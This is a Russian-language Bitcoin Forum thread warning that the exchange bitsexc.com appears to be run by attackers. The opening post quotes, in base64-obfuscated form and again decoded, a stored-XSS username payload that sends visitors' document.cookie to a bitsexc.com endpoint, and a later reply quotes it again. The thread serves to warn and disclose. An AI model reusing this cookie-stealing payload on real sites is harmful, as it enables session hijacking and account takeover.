Bitcoin Forum
August 22, 2019, 12:03:30 AM *
News: Latest Bitcoin Core release: 0.18.0 [Torrent] (New!)
 
   Home   Help Search Login Register More  
Pages: [1]
  Print  
Author Topic: Осторожно: хакерская биржа bitsexc.com  (Read 113 times)
kzv
Hero Member
*****
Offline Offline

Activity: 1330
Merit: 815


View Profile WWW
August 01, 2018, 09:50:26 AM
Last edit: August 01, 2018, 12:11:07 PM by kzv
Merited by esmanthra (2), Vadi2323 (1)
 #1

Хочу предостеречь новичков и не только от того, чтобы вводить какие-либо данные на сайте https://bitsexc.com/
Этот сайт принадлежит хакерам или контролируется ими!

Обнаружил я это по тому, как на моем сайте зарегистрировался пользователь с интересным именем:
Code:
<code class="html"><script>eval(atob('dmFyIGltZyA9IG5ldyBJbWFnZSgwLDApOyBpbWcuc3JjPSdodHRwczovL2JpdHNleGMuY29tL2luY2x1ZGVzL3NlbmQucGhwP2M9JyArIGRvY3VtZW50LmNvb2tpZTsgZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChpbWcpOw=='));</script></code>

Странное имя для пользователя подумал я и попробовал расшифровать строчку "dmFyIGltZyA9IG5ldyBJbWFnZSgwLDApOyBpbWcuc3JjPSdodHRwczovL2JpdHNleGMuY29tL2luY2x 1ZGVzL3NlbmQucGhwP2M9JyArIGRvY3VtZW50LmNvb2tpZTsgZG9jdW1lbnQuYm9keS5hcHBlbmRDaG lsZChpbWcpOw==". К счастью для расшифровки достаточно скопастить ее например на этом сайте https://www.base64decode.net/ (пункт Base64 decode)

Вот что там написано:

Code:
var img = new Image(0,0); img.src='https://bitsexc.com/includes/send.php?c=' + document.cookie; document.body.appendChild(img);

Если внезапно не все владеют яваскриптом, то перевожу на русский:
Хакер хотел чтобы все, кто заходит на страницу на которой показывается его имя пользователя, автоматически отправляли на сайт bitsexc.com данные о своей сессии-авторизаци. Дальще с этими данными хакер мог бы логиниться от имени других пользователей без пароля.

Open source crypto exchange https://trade.multicoins.org
Donate Marycoin project development: MS12okFu6D3FzBi2fTsmGEa6iQV9h31txe
1566432210
Hero Member
*
Offline Offline

Posts: 1566432210

View Profile Personal Message (Offline)

Ignore
1566432210
Reply with quote  #2

1566432210
Report to moderator
1566432210
Hero Member
*
Offline Offline

Posts: 1566432210

View Profile Personal Message (Offline)

Ignore
1566432210
Reply with quote  #2

1566432210
Report to moderator
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction. Advertise here.
DarkNightRider
Sr. Member
****
Offline Offline

Activity: 552
Merit: 271


View Profile
August 01, 2018, 01:25:58 PM
 #2

Строго говоря, так мог и не относящийся к бирже человек сделать. Чтобы подставить, например, добросовестных биржевиков Smiley
kzv
Hero Member
*****
Offline Offline

Activity: 1330
Merit: 815


View Profile WWW
August 01, 2018, 03:04:32 PM
 #3

Строго говоря, так мог и не относящийся к бирже человек сделать. Чтобы подставить, например, добросовестных биржевиков Smiley

Это классика: я не я, мне подкинули, нет у вас методов против Кости Сопрыкина )

Open source crypto exchange https://trade.multicoins.org
Donate Marycoin project development: MS12okFu6D3FzBi2fTsmGEa6iQV9h31txe
MisterPipka
Member
**
Offline Offline

Activity: 182
Merit: 11

https://www.cryptocarz.io/


View Profile WWW
August 01, 2018, 07:46:54 PM
 #4

Спасибо за информацию.Не когда бы не подумал.А откуда у вас именно таккая информация.Так для себя ,что бы знать или может узнавать еще !

provalentine
Member
**
Offline Offline

Activity: 159
Merit: 10


View Profile
August 02, 2018, 01:02:26 AM
 #5

Спасибо за информацию.Не когда бы не подумал.А откуда у вас именно таккая информация.Так для себя ,что бы знать или может узнавать еще !
Видимо вам надо очки по почте выслать... Если и сейчас не поймете откуда ТС такую информацию раздобыл то вам пожалуй даже подорожник не поможет.

Обнаружил я это по тому, как на моем сайте зарегистрировался пользователь с интересным именем:
Code:
<code class="html"><script>eval(atob('dmFyIGltZyA9IG5ldyBJbWFnZSgwLDApOyBpbWcuc3JjPSdodHRwczovL2JpdHNleGMuY29tL2luY2x1ZGVzL3NlbmQucGhwP2M9JyArIGRvY3VtZW50LmNvb2tpZTsgZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChpbWcpOw=='));</script></code>
Afony The Dilla
Newbie
*
Offline Offline

Activity: 29
Merit: 0


View Profile
August 06, 2018, 01:55:34 PM
 #6

хорошо видимо быть хакером
Crypto Sunchezz
Newbie
*
Offline Offline

Activity: 23
Merit: 0


View Profile
August 28, 2018, 05:01:27 PM
 #7

как распознать заранее что это хакерский сайт?
Pages: [1]
  Print  
 
Jump to:  

Sponsored by , a Bitcoin-accepting VPN.
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!